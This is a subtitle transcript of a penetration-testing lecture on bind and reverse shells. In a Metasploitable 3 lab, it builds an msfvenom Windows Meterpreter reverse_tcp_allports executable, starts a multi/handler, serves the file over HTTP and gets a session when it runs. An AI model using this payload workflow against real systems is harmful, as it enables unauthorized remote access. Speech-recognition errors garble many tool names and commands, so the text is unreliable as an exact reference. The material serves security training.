1 00:00:00,390 --> 00:00:06,450 All right, so there are two popular types of shells, bind and reverse. 2 00:00:07,700 --> 00:00:12,050 The usage of them depends on the situation that you're in, in the network. 3 00:00:13,000 --> 00:00:19,660 A Biden show opens up a new service on the target, and it requires you to connect to this service to 4 00:00:19,660 --> 00:00:20,320 get a session. 5 00:00:21,800 --> 00:00:25,760 But on the other hand, it's going to be different for a reversal. 6 00:00:27,060 --> 00:00:35,370 When you're using a reverse shell, you first need to open a service on your host to listen for incoming 7 00:00:35,370 --> 00:00:36,690 probes from the target. 8 00:00:38,250 --> 00:00:40,920 Then the target connects back to your host. 9 00:00:42,210 --> 00:00:49,020 So in a penetration test, you will mostly need to be using reverse because of these reasons and more. 10 00:00:50,290 --> 00:00:53,980 So I'll make it clearer with another example. 11 00:00:54,960 --> 00:01:03,120 For instance, you and a target, maybe in different private networks or a firewall of the target may 12 00:01:03,120 --> 00:01:04,770 block your connection attempts. 13 00:01:05,670 --> 00:01:10,800 What do you do and it's not just limited to these examples, but. 14 00:01:11,900 --> 00:01:18,740 Even when you decide to use a reverse shell due to some egressed firewall rules, the target may not 15 00:01:18,740 --> 00:01:20,120 allow you to get a session. 16 00:01:21,070 --> 00:01:28,480 And that's when you will try to create a reverse shell over some known port that's more typically allowed, 17 00:01:28,480 --> 00:01:33,190 such as 443, 83, 89 and so on. 18 00:01:34,590 --> 00:01:43,320 So when you create the payload, you only provide one port, so you know what, it's not an efficient 19 00:01:43,320 --> 00:01:49,200 way because it kind of makes you try new payloads with a new port on every attempt. 20 00:01:51,140 --> 00:01:59,250 But to avoid this, MSF has another payload type, which is reverse TCP all ports. 21 00:01:59,630 --> 00:02:01,480 You're wondering where I was coming from, huh? 22 00:02:02,690 --> 00:02:07,790 So the reverse TCP payload only allows connection to one port. 23 00:02:09,010 --> 00:02:19,540 But reverse TCP all ports is used to brute force all the ports from one to 65 535. 24 00:02:20,600 --> 00:02:27,860 So one thing to keep in mind, going through the entire port range from one to 65, 535 can take a very 25 00:02:27,860 --> 00:02:28,420 long time. 26 00:02:29,300 --> 00:02:31,130 So think twice before you use it. 27 00:02:31,940 --> 00:02:32,630 You know me. 28 00:02:33,560 --> 00:02:35,780 I see an example and Métis Boydell three. 29 00:02:37,290 --> 00:02:44,100 So open up your terminal and start Métis boy, then search the term all ports in Palos. 30 00:02:48,420 --> 00:02:51,810 And here are the modules related to the term Allport. 31 00:02:53,220 --> 00:02:58,920 And you can probably see the upwards version of some of the payloads that we've been using in the previous 32 00:02:58,920 --> 00:02:59,400 lectures. 33 00:03:00,610 --> 00:03:03,250 You can also display the information of this module. 34 00:03:05,970 --> 00:03:10,530 So let's look at the description of the airport variable. 35 00:03:11,690 --> 00:03:14,030 So it starts on PT. one. 36 00:03:15,140 --> 00:03:17,660 So this means you can set a start value. 37 00:03:18,910 --> 00:03:23,530 So before creating a file with that payload, I'm going to start a handler for that. 38 00:03:24,760 --> 00:03:29,320 To do that will use exploit multi handler as our template. 39 00:03:31,410 --> 00:03:35,340 Set payload to Windows Interpreter. 40 00:03:36,660 --> 00:03:39,210 Reverse TCP Allport. 41 00:03:41,750 --> 00:03:45,020 SAT almost to Collie's IP address. 42 00:03:46,180 --> 00:03:47,830 And show me the options. 43 00:03:49,850 --> 00:03:52,490 So I won't use the set outpoured value. 44 00:03:54,520 --> 00:04:01,990 OK, I'll now open another window to create that ETEC file with reverse all ports payload. 45 00:04:03,450 --> 00:04:06,270 And we'll use MSF venom for this. 46 00:04:07,300 --> 00:04:08,320 P windows. 47 00:04:10,110 --> 00:04:11,010 Interpretor. 48 00:04:12,090 --> 00:04:21,300 Reverse Tsipi, all ports almost equals 10, 10 dot to dot 11. 49 00:04:22,340 --> 00:04:25,220 I'm not going to set Allport even here. 50 00:04:26,650 --> 00:04:29,770 Set file format 2.0 Yangzi. 51 00:04:30,960 --> 00:04:32,550 And zap platform to Windows. 52 00:04:34,800 --> 00:04:37,410 So finally, let's give a name to the output file. 53 00:04:39,520 --> 00:04:41,120 iReports dot exi. 54 00:04:43,200 --> 00:04:44,750 Now I'll go to another town. 55 00:04:46,130 --> 00:04:48,700 And start the exploit in the background. 56 00:04:50,430 --> 00:04:52,800 Jobs to list the background job. 57 00:04:53,710 --> 00:04:55,900 And here's a job that I've currently created. 58 00:04:57,170 --> 00:05:01,580 Now, there's no session as well, so let's go to another time. 59 00:05:02,590 --> 00:05:11,230 Now, I'm going to start a python web here to be able to download Allport, Scott Yuxi from that exploitable 60 00:05:11,230 --> 00:05:11,590 three. 61 00:05:13,030 --> 00:05:19,330 And met a spoiled three is on my second screen, so I'm going to try to bring my parents screen over. 62 00:05:20,710 --> 00:05:25,150 And now I will open Internet Explorer. 63 00:05:26,430 --> 00:05:28,500 Hmmm, I wonder if these warnings are going to let me. 64 00:05:29,780 --> 00:05:38,330 So let's go to HTP tend tend to dot one one Colen eight zero eight zero. 65 00:05:39,630 --> 00:05:46,440 And look at that, as soon as I connect the COLLY, the messages show up on the screen. 66 00:05:47,830 --> 00:05:51,760 So now let's click and download the Allport file. 67 00:05:53,310 --> 00:05:55,430 I'll say that file to the desktop. 68 00:06:01,470 --> 00:06:08,700 And as soon as I click on the file in my disposable three hour session opened in the MSF Council. 69 00:06:09,770 --> 00:06:11,070 Let's look at the connected port. 70 00:06:11,840 --> 00:06:12,830 It is one. 71 00:06:13,990 --> 00:06:16,510 And here are all the sessions.